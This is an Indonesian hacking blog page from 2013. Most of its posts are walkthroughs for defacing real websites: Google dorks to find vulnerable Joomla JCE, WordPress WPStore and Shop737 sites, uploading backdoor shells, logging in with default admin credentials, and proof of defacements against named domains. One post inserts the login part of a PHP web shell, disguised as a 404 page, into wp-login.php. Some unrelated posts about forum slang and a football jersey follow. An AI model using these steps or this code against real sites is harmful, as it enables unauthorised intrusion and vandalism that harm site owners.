Rabu, 05 Juni 2013

Exploit Joomla JCE Remote File Upload Vulnerability

Posted by Erza Jullian 13.07, under | No comments

Wordpress dan Joomla. Ya, kedua CMS itu memang yang paling banyak terdapat bug yang bisa dideface lewat exploit exploit sederhana. Dan kali ini saya akan share cara mudah deface web CMS Joomla dengan Exploit Joomla JCE Remote File Upload Vulnerability. Tentu saja dengan kreatifitas kalian dalam mengolah dork. :p

Oke langsung saja.

Bahan-bahan :

Tools Joomla Exploiter <-- Klik untuk download. Password RAR : yuyud-jeje [ passwordnya maksa banget. :v ]

Google Dork : inurl:index.php?option=com_jce . Use your brain. Kembangin sendiri dorknya. :)



Langkah-langkah.

Pertama, cari target di Google dengan dork diatas. Cari satu-satu. Yang sabar. Untuk tutorial ini target saya adalah http://defelsko.su/ .

Buka Tools Joomla Exploiter [ JCE.exe ] , masukkan web target lalu klik start. Lihat SS :




Step 1

Tunggu sampai proses upload selesai. Jika target memang vuln, maka akan muncul link seperti di Screenshoot berikut :




Step 2

Jika tidak ada berarti target tidak vuln Cari web lain.

Jika muncul link seperti di SS, tinggal kita buka link yang tertera disitu. :) .

http://[site]/images/stories/3xp.php

Maka akan muncul Uploader. Kalian bisa mengupload Backdoor lewat situ. Lihat SS :




Step 3

Biasanya bisa upload file .php , namun ada beberapa web yang gagal saat upload file .php . Jika gagal, coba upload file html atau txt . :)

Kali ini saya coba upload Backdoor .php dan berhasil. Jika berhasil akan ada notice Upload ok :d !!! . Lihat SS :




Step 4

Oke, sekarang tinggal kita buka Backdoornya. Tinggal ubah 3xp.php di url menjadi namashell.php . Sehingga menjadi [site]/images/stories/namashell.php .

Buka Backdoornya :)




Our Privat Shell. :)

Kalau sudah begitu ya terserah mau diapain. Langsung cari indexnya, tebas  :v



Defaced. :3

http://defelsko.su/index.html

Mirror :

http://www.zone-h.org/mirror/id/19953295



Sekian tutorial kali ini. Jadikan pembelajaran saja. Kalo ada apa-apa, resiko tanggung dewe. Use at Your Own Risk !!

Created by Nabilaholic - Madura Cyber

Selasa, 04 Juni 2013

Wordpress SQL Injection | Bypassing Password Hash

Posted by Erza Jullian 17.43, under | No comments


Tutorial Video


Melindungi Halaman Login Wordpress dengan Tampilan Error 404 Not Found

Posted by Erza Jullian 15.18, under | No comments

Beberapa waktu yang lalu saya pernah share cara menyembunyikan halaman login pada wordpress dengan cara mengganti alamat default loginnya yaitu /wp-login.php . Namun mungkin cara itu tergolong ribet karena kode yang harus diganti jumlahnya lebih dari sepuluh. Ada cara yang lebih praktis. Yaitu menutup halaman login WP dengan Halaman Error 404 Not Found.

Jadi saat  site/wp-login.php diakses maka tampilan awalnya adalah Error 404 Not Found. Bagi yang sering memakai backdoor shell macam 1n73ction atau blackshadow pasti tau yang saya maksud. Ya, halaman 404 Not Found tersebut sebenarnya dilindungi password bertipe md5.

Oke, daripada bingung langsung saja kita praktekkan. :)



Pertama, masuk akun cpanel sobat.

Kedua, masuk menu file manager.

Masuk direktori Wordpress sobat.

Cari file wp-login.php . Buka file tersebut.

Hapus kode <?php di paling atas dan ganti dengan script dibawah ini.

ini scriptnya :




<?php

error_reporting(E_ALL^(E_NOTICE|E_WARNING));

//authentication

$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5

$color = "#00ff00";

$default_action = 'FilesMan';

@define('SELF_PATH', __FILE__);

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {

    header('HTTP/1.0 404 Not Found');

    exit;

}

@session_start();

@error_reporting(0);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@define('VERSION', '2.1');

if( get_magic_quotes_gpc() ) {

    function stripslashes_array($array) {

        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

    }

    $_POST = stripslashes_array($_POST);

}

function printLogin() {

    ?>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<hr>

<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>

    <style>

        input { margin:0;background-color:#fff;border:1px solid #fff; }

    </style>

    <form method=post>

    <input type=password name=pass>

    </form>

    <?php

    exit;

}

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))

    if( empty( $auth_pass ) ||

        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

    else

        printLogin();



if( strtolower( substr(PHP_OS,0,3) ) == "win" )

    $os = 'win';

else

    $os = 'nix';

$safe_mode = @ini_get('safe_mode');

$disable_functions = @ini_get('disable_functions');

$home_cwd = @getcwd();

if( isset( $_POST['c'] ) )

    @chdir($_POST['c']);

$cwd = @getcwd();

if( $os == 'win') {

    $home_cwd = str_replace("\\", "/", $home_cwd);

    $cwd = str_replace("\\", "/", $cwd);

}

if( $cwd[strlen($cwd)-1] != '/' )

    $cwd .= '/';

    

if($os == 'win')

    $aliases = array(



    );

else

    $aliases = array(



    );


Sehingga nanti menjadi :




<?php

error_reporting(E_ALL^(E_NOTICE|E_WARNING));

//authentication

$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5

$color = "#00ff00";

$default_action = 'FilesMan';

@define('SELF_PATH', __FILE__);

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {

    header('HTTP/1.0 404 Not Found');

    exit;

}

@session_start();

@error_reporting(0);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@define('VERSION', '2.1');

if( get_magic_quotes_gpc() ) {

    function stripslashes_array($array) {

        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

    }

    $_POST = stripslashes_array($_POST);

}

function printLogin() {

    ?>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<hr>

<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>

    <style>

        input { margin:0;background-color:#fff;border:1px solid #fff; }

    </style>

    <form method=post>

    <input type=password name=pass>

    </form>

    <?php

    exit;

}

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))

    if( empty( $auth_pass ) ||

        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

    else

        printLogin();



if( strtolower( substr(PHP_OS,0,3) ) == "win" )

    $os = 'win';

else

    $os = 'nix';

$safe_mode = @ini_get('safe_mode');

$disable_functions = @ini_get('disable_functions');

$home_cwd = @getcwd();

if( isset( $_POST['c'] ) )

    @chdir($_POST['c']);

$cwd = @getcwd();

if( $os == 'win') {

    $home_cwd = str_replace("\\", "/", $home_cwd);

    $cwd = str_replace("\\", "/", $cwd);

}

if( $cwd[strlen($cwd)-1] != '/' )

    $cwd .= '/';

  

if($os == 'win')

    $aliases = array(



    );

else

    $aliases = array(



    );





/**

 * WordPress User Page

 *

 * Handles authentication, registering, resetting passwords, forgot password,

 * and other user handling.

 *

 * @package WordPress

 */



/** Make sure that the WordPress bootstrap has run before continuing. */

require( dirname(__FILE__) . '/wp-load.php' );



// Redirect to https login if forced to use SSL

if ( force_ssl_admin() && !is_ssl() ) {

if ( 0 === strpos($_SERVER['REQUEST_URI'], 'http') ) {

wp_redirect(preg_replace('|^http://|', 'https://', $_SERVER['REQUEST_URI']));

exit();

} else {

wp_redirect('https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

exit();

}

  --------- ---- dan seterusnya -----------------------



<?php

login_footer();

break;

} // end action switch

?>





Kode yang saya beri warna merah itu adalah password bertipe md5.

Anda bisa menggantinya di situs-situs untuk convert password menjadi md5 atau bisa menggunakan tools saya. :v

Klik Disini. - Tools Hash Password

Masukkan kata yang ingin di encode. Jika sudah, pilih yang MD5





Contoh password md5 :

nabilah : 6138f95a7e66e7373c8d770ad348d13c

achan : 39a54ee9b50e3484df126d83277593dc

jeje : 21dbd9ee5a8e54ec3157e76b32ce450c



dll.

Intinya, password harus bertipe md5. Setelah itu, klik save. Done. Coba cek page login wordpress sobat. Pasti yang muncul adalah halaman 404 Not Found. Lalu klik tombol TAB di keyboard sebanyak 2x, maka akan ada form password.





Masukkan password yang sudah sobat convert menjadi md5 pada tutorial di atas. Maka halaman login akan terbuka. :)





Untuk live demo silahkan lihat disini :

Live Demo

Sekian tutorial kali ini. Semoga bisa mempersulit lamer yang ingin membobol WP sobat. :v

Jika ada yang kurang jelas, silahkan beri komentar. :)

Created by Nabilaholic - Madura Cyber



Source : Thread nya bang e1nzte1n di www.hacker-newbie.org

Exploit WPStore Themes Upload Vulnerability

Posted by Erza Jullian 13.36, under | No comments

Kali ini saya akan share tutorial Exploit WPStore Themes Upload Vulnerability pada CMS Wordpress. Sebenarnya ini bug lama, namun sampai sekarang ternyata masih banyak web yang vuln dengan exploit ini. Tentu saja dengan kesabaran dan kepintaran mengolah dork google dalam mencari target.

Bahan bahan :


Google Dork :


inurl:/wp-content/themes/framework

inurl:/wp-content/themes/KidzStore

inurl:/wp-content/themes/emporium

"Storebox by" intext:dress -> dress bisa diganti dengan kata-kata yang berhubungan dengan belanja, bisa Shoes, Jacket, dll.



Silahkan dikembangkan sendiri. Use your brain bitch !! :p



Langsung saja tuh dork tempelin di google. Nyarinya yang sabar. Kali ini saya pilih : http://shopshack.net .

Lalu lihat suorce dari shopshack.net . Bisa dengan ctrl+u atau klik kanan - view source.





Lihat baris wp-content/themes .

Contoh : http://shopshack.net/wp-content/themes/framework/library/js/jquery-1.3.2.min.js

Buka link tersebut dan ubah menjadi

http://shopshack.net/wp-content/themes/framework/upload

Intinya, setelah nama themes diganti dengan /upload/.

Maka kalian akan melihat tempat upload. Kali 404 Not Found ya berarti anda kurang ganteng alias faktor face. Cari target lain. :p

Nih SS nya :






Tempat Upload



Upload backdoor shell kalian disitu. Tunggu sampai loadingnya selesai.

Jika sudah, lihat shellnya di : [localhost]/wp-content/uploads/products_img/[namashell].php





Ya kalau sudah gitu mau diapain lagi. Silahkan dilanjutkan sendiri. Hehehehehe



Sekian tutorial kali ini. Semoga bermanfaat



Credit by Nabilaholic - Madura Cyber

Minggu, 02 Juni 2013

Apa Kepanjangan dari TS ?

Posted by Erza Jullian 04.41, under , | No comments

Apa kepanjangan dari TS ?

Mungkin bagi yang aktif di forum-forum terutama Kaskus tidak asing lagi dengan kata TS. Dan mungkin sudah banyak yang tau apa itu TS.

Tapi ternyata tadi ada yang PM di Facebook menanyakan apa itu TS.

Nih Screenshootnya :






Apa Itu TS ?

Sekalian aja deh update postingan di blog. :)

TS adalah singkatan dari Thread Starter. Artinya orang yang memulai sebuah diskusi disebuah forum atau orang yang membuat thread.

Sekian info kali ini, semoga bermanfaat.

Sabtu, 01 Juni 2013

Exploit Shop737 File Upload Vulnerability

Posted by Erza Jullian 04.56, under | No comments

Oke, kali ini saya akan share salah satu teknik deface dengan Exploit Shop737 File Upload Vulnerability. Maaf kalo judulnya salah. Itu cuma ngarang sendiri. Soalnya sumber awal yang jadi refrensi saya juga bingung dikasih judul apa.

Oke langsung saja.

Bahan :

1. Google Dork : intext:"Powered by Shop737"  <- Use your brain ! Dork silahkan dikembangkan sendiri. :p

2. File berformat .txt



Langkah-langkah :

1. Langsung saja berselancar di google.com dengan dork diatas. lalu pilih salah satu web. Sebagai contoh saya pilih http://balimalio.com/poto/

2. Masukkan exploitnya. site/poto/upload.php . Jadi untuk contoh menjadi http://balimalio.com/poto/upload.php

3. nanti jika suruh memasukkan password sama username isi saja :

User : admin

Password : admin

4. Maka akan masuk ke tempat uploadnya.





Oke, tinggal diisi. Form atas untuk membuat kategori baru. Untuk contoh saya buat kategori baru dengan nama jcvan . Lalu klik buat kategori.

Upload ke : pilih folder tempat file akan diupload. Untuk contoh saya upload ke folder yang tadi saya buat yaitu ke folder jcvan .

File yang diupload : klik pilih berkas dan upload file berformat jpg atau txt

Lalu klik Upload di paling bawah.

5. Jika upload sudah selesai, sekarang kita panggil filenya. letaknya ada di site/poto/[folder]/file.txt

Maka file saya akan berada di http://balimalio.com/poto/jcvan/jj.txt








Uploaded by Newbie_Inside .

I Love You Jessica Vania. :*

Problem ??



Sekian tutorial kali ini. Semoga bermanfaat.

Refrensi : IDCA

Jersey Baru Real Madrid Musim 2013 - 2014

Posted by Erza Jullian 02.23, under , | No comments

Real Madrid sudah merilis kostum mereka untuk musim depan. Jersey mereka masih diproduksi oleh Adidas. Peluncuran jersey ini bersamaan dengan terjalinnya kerjasama antara Real Madrid dengan Emirates Airlines.

Inilah penampakan dari Jersey Real Madrid untuk Musim 2013 - 2014 :




Jersey Real Madrid Musim Depan



berikut ulasan singkat Jersey Real Madrid Musim 2013 - 2014. Brand BWIN di depan akan diganti dengan partner baru Real Madrid, FLY EMIRATES. Prosesei kerjasama antara Real Madrid dan Fly Emirates ini digelar di Santiago Bernabeu, stadion kebanggan Madridista.



Seperti yang terlihat diaras, warna putih masih mendominasi dengan aksen oranye di bagian leher dan lengan. Ada garis-garis horizontal berwarna putih terang di jersey kali ini.

Blog Archive

Blog Archive